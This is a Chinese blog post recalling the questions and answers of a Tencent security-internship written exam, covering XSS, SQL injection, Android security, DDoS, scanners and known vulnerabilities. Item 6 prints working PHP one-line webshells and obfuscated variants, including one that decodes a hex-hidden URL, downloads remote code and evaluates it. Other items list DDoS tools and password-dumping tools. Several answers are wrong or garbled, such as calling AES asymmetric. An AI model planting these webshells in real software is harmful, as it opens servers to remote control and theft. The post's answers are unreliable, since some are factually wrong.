TX安全技術筆試回憶(實習)

本文的筆試題答案來自百度、谷歌,筆者只是知識的搬運工,如有錯誤歡迎大家批評指正!!

  1. xss的危害

    xss***過程大致如下:***者的Html輸入—>web程序—>進入數據庫—>web程序—>用戶瀏覽器,***者在遠程web頁面的html代碼中插入具有惡意目的的數據,用戶認爲該頁面是可信的,但瀏覽器下載該頁面時,嵌入其中的腳本將被解釋執行。

    防範方法:過濾"<>","&","=","","""",ReplaceR(str,"<","<"),Replace(str,">",">")

  2. 獲取域名DNS記錄的命令:nslookup,dig

  3. php避免sql注入的函數:addslashes用於處理單字節的,mysql_real_escape_string可用於處理多字節,且只能用在(php5以上 or php4>=4.3.0)版本,否則只能用mysql_escape_string,magic_quotes_gpc只有在頁面傳遞 $_GET,$_POST,$_COOKIE 時纔會發生作用,主動進行調用,在web客戶端執行.

  4. android開發中哪些習慣會導致安全漏洞:

    a.數據存儲:將隱私數據明文保存在外部存儲,將系統數據明文保存在外部存儲,將軟件運行時依賴的數據保存在外部存儲,將軟件安裝包或者二進制代碼保存在外部存儲,全局可讀寫的內部文件,內部敏感文件被root權限軟件讀寫

    b.網絡通信:不加密地明文傳輸敏感數據,SSL通信不檢查證書有效性(可能造成中間人***),使用短信註冊賬戶或接收密碼

    c.密碼和認證策略:明文存儲和編碼存儲密碼,對外服務的弱密碼或固定密碼,使用IMEI或IMSI作爲唯一認證憑據

  5. cc***:模擬多個用戶不停地訪問那些需要大量數據操作的頁面,造成服務器資源的浪費,導致cpu長期處在100%,永遠有處理不完的連接,造成網絡阻塞。分爲直接***,代理***,僵屍網絡***。當遭遇cc***時,應對手段:取消域名綁定,域名欺騙解析,更改web端口,IIS屏蔽ip

  6. 常見PHP“一句話***”:<?php eval($_POST[CMD]);?> or <?php eval($_GET[CMD]);?>

    變種:

    <?php $x=$_GET[‘z’];@eval(“$x;”);?>,$a=str_replace(x,””,”axsxxsxexrxxt”);$a($_POST[“code”]);,

    $_GET[‘a’]($_GET[‘b’]);,

    ($code = $_POST['code’])&&@preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).'($code)’, ‘add’);,

    $filename=$_GET[‘code’];include ($filename);,

    上傳.user.ini,並且寫入auto_prepend_file=code.gif 將一句話隱藏在code.gif中,並且將它上傳到同一目錄下,if(empty($_SESSION[‘api’]))$_SESSION[‘api’]=substr(file_get_contents(sprintf(‘%s?  %s’,pack(“H*”,’687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION[‘api’]),null);

  7. nmap 10.5.5.5.1 默認的掃描端口:沒明白什麼意思!

  8. android manifest.xml什麼配置使內部文件被盜?

  9. 自動化web漏洞掃描工具有哪些:nikito,paros proxy,webscarab,webinspect,owasp zap,burpsuite,IBM security appscan,acunetix web vulnerability scanner,safe3 scanner,n-stealth

  10. http數據抓包工具:各瀏覽器自帶的瀏覽器,wireshark,fiddler等等

  11. AES加密:非對稱加密,其他的還有RSA,Elgamal算法等

  12. 哪些工具可以抓取windows的明文密碼:mimikatz 2.0,wce 1.42 beta,fgdump 2.10,powermemory-RWMC

  13. 哪些服務器存在文件解析漏洞:詳情可見http://drops.wooyun.org/papers/539

  14. DDOS***工具:LOIC,XOIC,HULK,DDOSIM-layer,R-U-Dead-Yet,Tor&#039;hammer,PyLoris,OWASP DOS HTTP POST,DAVOSET,黃金眼http拒絕服務工具

  15. 攔截修改http數據包的工具:pproxy,fiddler,charles

  16. 如何大批量獲取網站註冊用戶身份信息?

  17. xcodeghost,wormhole,心臟滴血,shellshock的危害

    xcodeghost:xcode帶有coreservice庫文件,編譯出來的app就會被ghost感染。會手機iphone以及app的一些基本信息,比如系統版本,語言,國家,應用名稱等等,但代碼本身並無惡意。

    wormhole:無論是wifi還是3g/4g網絡,只要是聯網情況下都有可能遭受***。且此漏洞只和app有關,不受系統版本影響。

    心臟滴血:這是一個出現在加密程序庫openSSL的程序錯誤,原因是在實現TLS的心跳擴展時沒有對輸入進行適當的驗證(缺少便捷檢查),屬於緩衝區過讀錯誤,即可讀的數據比應該允許讀取的數據多。每次心跳中暴露客戶端與服務器通信中的64k內存。

    shellshock(破殼):bash4.3及以前的版本在處理某些構造的環境變量時存在安全漏洞,向環境變量值內的函數定義後添加多餘的字符串,***者可通過此漏洞繞過或改變環境限制,以執行任意的shell命令甚至完全控制目標系統。

  18. CSRF(跨站請求僞造):通過僞造身份來提交post和get請求來完成跨域的***

  19. Android應用http中間人***原因:詳見http://jaq.alibaba.com/blog.htm?id=60

  20. linux下查看ssh登錄歷史記錄命令:less secure,linux下登錄日誌在/var/log中

  21. 訪問web網站的某資源不存在,返回http的狀態碼是:404

  22. ASLR(地址隨機化)是對抗緩衝區溢出***的技術。

  23. “xss終結者”使用HTTP頭部來限制資源的策略是:CSP(content security policy)

  24. win下查看系統用戶列表的命令:whoami /all

  25. sql(mysql)注入常用延時函數:benchmark

  26. Redis默認端口:6379

  27. 網站被上傳了webshell如何處理?

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章